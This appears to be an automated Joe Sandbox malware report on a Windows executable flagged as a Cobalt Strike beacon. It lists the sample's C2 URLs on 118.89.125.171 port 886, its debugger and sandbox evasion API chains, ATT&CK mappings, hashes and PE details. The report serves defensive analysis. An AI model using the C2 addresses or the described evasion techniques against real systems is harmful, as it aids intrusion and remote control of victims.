Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49867

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A7E0E8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_03A7E0E8

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A6F654		0_2_03A6F654
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A73FA4		0_2_03A73FA4

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_0-97267
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-97353

Source: C:\Users\user\Desktop\cH0s914NeF.exe

API coverage: 4.5 %

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A73FA4

0_2_03A73FA4

Source: C:\Users\user\Desktop\cH0s914NeF.exe TID: 4688

Thread sleep time: -8940000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A70F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03A70F28
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A7780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_03A7780C

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_004015F1 GetSystemInfo,GetSystemInfo,GetCurrentProcess,VirtualQueryEx,

0_2_004015F1

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: cH0s914NeF.exe, 00000000.00000002.3262982479.00000000000EA000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000003.2307039847.000000000014F000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000002.3262982479.000000000014F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\cH0s914NeF.exe

API call chain: ExitProcess graph end node

graph_0-97334

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-96642

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A80090 __crtCaptureCurrentContext,IsDebuggerPresent,

0_2_03A80090

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A87604 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_03A87604

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A8E0E4 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,

0_2_03A8E0E4

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A8E314 VirtualQuery,GetModuleFileNameW,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

0_2_03A8E314

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004011B0 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,GetStartupInfoA,	0_2_004011B0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00401DEC AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualProtect,VirtualProtect,	0_2_00401DEC
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00418819 SetUnhandledExceptionFilter,	0_2_00418819
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004D1580 SetUnhandledExceptionFilter,	0_2_004D1580
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0040BBC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_0040BBC0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A7BEF0 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_03A7BEF0

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A7BE68 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_03A7BE68

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A6FC2C CreateNamedPipeA,

0_2_03A6FC2C

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_0040BAE0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040BAE0

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A74578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_03A74578

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A74578 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_03A74578

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR
Source: Yara match	File source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A7CE10 socket,closesocket,htons,bind,listen,	0_2_03A7CE10
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A74CF8 htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_03A74CF8
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A75100 socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_03A75100

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	111 Virtualization/Sandbox Evasion	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Process Injection	21 Access Token Manipulation	Security Account Manager	111 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	2 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	5 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
cH0s914NeF.exe	55%	ReversingLabs	Win64.Backdoor.CobaltStrikeBeacon
cH0s914NeF.exe	60%	Virustotal		Browse

Source	Detection	Scanner	Link
http://118.89.125.171:886/ZZv3ce	14%	Virustotal	Browse
http://118.89.125.171:886/ZZv3	12%	Virustotal	Browse
http://118.89.125.171:886/ga.jsp	14%	Virustotal	Browse
http://118.89.125.171:886/ga.js5.171:886/ga.js	12%	Virustotal	Browse
http://118.89.125.171:886/ga.js8	14%	Virustotal	Browse
118.89.125.171	17%	Virustotal	Browse
http://118.89.125.171:886/ga.js	12%	Virustotal	Browse

Name	Malicious	Antivirus Detection	Reputation
http://118.89.125.171:886/ga.js	true	12%, Virustotal, Browse	unknown
http://118.89.125.171:886/ZZv3	true	12%, Virustotal, Browse	unknown
118.89.125.171	true	17%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://118.89.125.171:886/ZZv3ce	cH0s914NeF.exe, 00000000.00000002.3262982479.00000000000EA000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse	unknown
http://118.89.125.171:886/ZZv3mMM	cH0s914NeF.exe, 00000000.00000002.3262982479.00000000000EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://118.89.125.171:886/ga.jsO	cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://118.89.125.171:886/ga.jsp	cH0s914NeF.exe, 00000000.00000002.3262982479.000000000014F000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse	unknown
http://118.89.125.171:886/ga.js5.171:886/ga.js	cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse	unknown
http://118.89.125.171:886/ga.js6	cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://118.89.125.171:886/ga.js8	cH0s914NeF.exe, 00000000.00000003.2307039847.000000000014F000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse	unknown
http://118.89.125.171:886/ga.jsX	cH0s914NeF.exe, 00000000.00000003.2307039847.000000000014F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://118.89.125.171:886/ga.jsc	cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:%u/	cH0s914NeF.exe, 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	false		low
http://118.89.125.171:886/ga.js5.171:886/ga.jsl	cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
118.89.125.171	unknown	China		45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1429067
Start date and time:	2024-04-20 15:21:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cH0s914NeF.exe renamed because original name is a hash value
Original Sample Name:	0cfc4721129ac02deb897ed2becafd9a.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/1@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 20 Number of non-executed functions: 257
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:21:57	API Interceptor	150x Sleep call for process: cH0s914NeF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
118.89.125.171	XnlOH69y9T.exe	Get hash	malicious	CobaltStrike	Browse
118.89.125.171	1.exe	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	BzmhHwFpCV.elf	Get hash	malicious	Mirai	Browse	150.158.129.2
	SecuriteInfo.com.Trojan.Siggen17.35688.9477.7627.exe	Get hash	malicious	Poisonivy	Browse	139.199.218.80
	SecuriteInfo.com.Trojan.Siggen17.35688.9477.7627.exe	Get hash	malicious	Unknown	Browse	139.199.218.80
	#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	120.53.134.123
	QFR4Qsnm6y.elf	Get hash	malicious	Mirai	Browse	62.234.100.160
	0Ox8zezLAz.elf	Get hash	malicious	Mirai	Browse	118.89.25.10
	SecuriteInfo.com.Trojan.Inject4.54824.15312.17403.exe	Get hash	malicious	Unknown	Browse	106.53.131.19
	2024#U5e74#U4e8c#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	120.53.134.123
	zfehGxWbb4.elf	Get hash	malicious	Mirai	Browse	106.54.63.210

Process:	C:\Users\user\Desktop\cH0s914NeF.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	18191
Entropy (8bit):	5.084746143794873
Encrypted:	false
SSDEEP:	384:eUyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyVXyw:eUyVXyVXyVXyVXyVXyVXyVXyVXyVXyVL
MD5:	B0BB81DA1767783BFBB23B7E6750CE89
SHA1:	840F640657F656CFCFEF01F19F3E3D22F31209E8
SHA-256:	FEC126001F51CDC60FBF5DE0BA0D4113CBFE490ABC17B483F0821500D82A24A9
SHA-512:	69AB344E1B548E979E442BE2D27BBAE1CAFBB449EA4F1FABB608EF7A943C063C85BD8878569655761376FF59A28A7033260ED6E91A2A0D1640A57117E07DF67E
Malicious:	false
Reputation:	low
Preview:	....:0x1d0000..sleep 60000..Address: 0x3a60000.Size: 352256.state: 1000.type: 20000.............................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000......................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000......................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000......................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000......................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000......................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000......................sleep 60000..Address: 0x3a60000.Size: 56000.state: 1000.type: 20000..................

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	5.857488034921309
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cH0s914NeF.exe
File size:	2'434'849 bytes
MD5:	0cfc4721129ac02deb897ed2becafd9a
SHA1:	7cd5ee2d1b58f5a2d8ee00b2cc880df752ef0081
SHA256:	fc0e10c66b7e8f4c6d744e4c9ed4ce3407018c2b4ff71a327f5fb613d2ca3ca9
SHA512:	dfca0b365f463c8ab9eefcf0946dff89f6ae7e182b97cd4c2af11f97a757ccfe3f61697525174963ac9e0d000101933cda5ecd64fc1e1a12a8a50b44d50edb00
SSDEEP:	24576:62HcXHZ8AW2HV21dFiE0lHN1N12pDJN7555X555d555y555N8pYqzDy3+Ec0xMkF:FcXHZN1HVyFiE00pK8pNvFCb546
TLSH:	0CB5C74369DB0DA5DED66BB462C35335A778FD75CF2A1F2BA608C23129532C4AD1EB00
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...-o.f.j..3w....'...........................@.............................. .......]%...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x401500
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x661F6F2D [Wed Apr 17 06:41:49 2024 UTC]
TLS Callbacks:	0x40bcf0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	af6ba46f018025bc39d185139e185701

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	25/04/2022 02:00:00 21/05/2025 01:59:59
Subject Chain	CN="Beijing Yincaishijiao Technology Co., Ltd", O="Beijing Yincaishijiao Technology Co., Ltd", S=Beijing, C=CN, SERIALNUMBER=91110108MA01GPWJ2N, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=Haidian District, OID.1.3.6.1.4.1.311.60.2.1.2=Beijing, OID.1.3.6.1.4.1.311.60.2.1.3=CN
Version:	3
Thumbprint MD5:	A1373F4D456969A46356DA9BDD3D0DE0
Thumbprint SHA-1:	621417244358F1E23D92E69CF1A2FA48F1F58BC6
Thumbprint SHA-256:	9A378462D94C33943AA76C094F6C5120EDCAF5E4360878BE8BD5BEAEBAD538A0
Serial:	03CADF0C5DB10F74EBD7C6E260528AB9

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [000AA175h]
mov dword ptr [eax], 00000000h
call 00007F059951A85Fh
call 00007F059950FF2Ah
nop
nop
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
dec eax
mov ebp, esp
pop ebp
ret
nop word ptr [eax+eax+00000000h]
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 20h
dec eax
cmp dword ptr [000A4110h], 00000000h
je 00007F05995102C2h
dec eax
lea ecx, dword ptr [000A4AA7h]
call dword ptr [000CFF79h]
dec eax
test eax, eax
je 00007F05995102C1h
dec eax
lea edx, dword ptr [000A4AA3h]
dec eax
mov ecx, eax
call dword ptr [000CFF74h]
dec eax
test eax, eax
je 00007F059951029Bh
dec eax
lea ecx, dword ptr [000A40E0h]
call eax
dec eax
lea ecx, dword ptr [00000017h]
dec eax
add esp, 20h
pop ebp
jmp 00007F059951A6D2h
dec eax
lea eax, dword ptr [FFFFFF96h]
jmp 00007F059951026Fh
nop dword ptr [eax+00h]
push ebp
dec eax
mov ebp, esp
pop ebp
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
push ebx
dec eax
sub esp, 38h
dec eax
lea ebp, dword ptr [esp+00000080h]
dec eax
mov dword ptr [ebp-30h], ecx
dec eax
mov dword ptr [ebp-28h], edx
dec esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd1000	0x11f4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb5000	0xa818	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24f7b1	0x2f70
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xd4020	0x28	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd1470	0x420	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa09c0	0xa0a00	7c6b917dd07f226a0c738b06da5c50d9	False	0.35914548881322955	data	6.109791801865552	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa2000	0x3668	0x3800	9c4d71fdfaa296e9692c2a54ca7a963b	False	0.08391462053571429	dBase III DBT, version number 0, next free block index 10, 1st item "mw\0328->;;6xbygw\17748:'6#>5;2lw\032\004\036\022wnyglw"	1.0548497317499073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa6000	0xe500	0xe600	8c8191229d6c789572a6048d89d4a4a0	False	0.2255264945652174	data	4.254857790417933	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0xb5000	0xa818	0xaa00	29f2dba540ad32f4ffecffc788594461	False	0.5167738970588235	data	5.853166387287358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
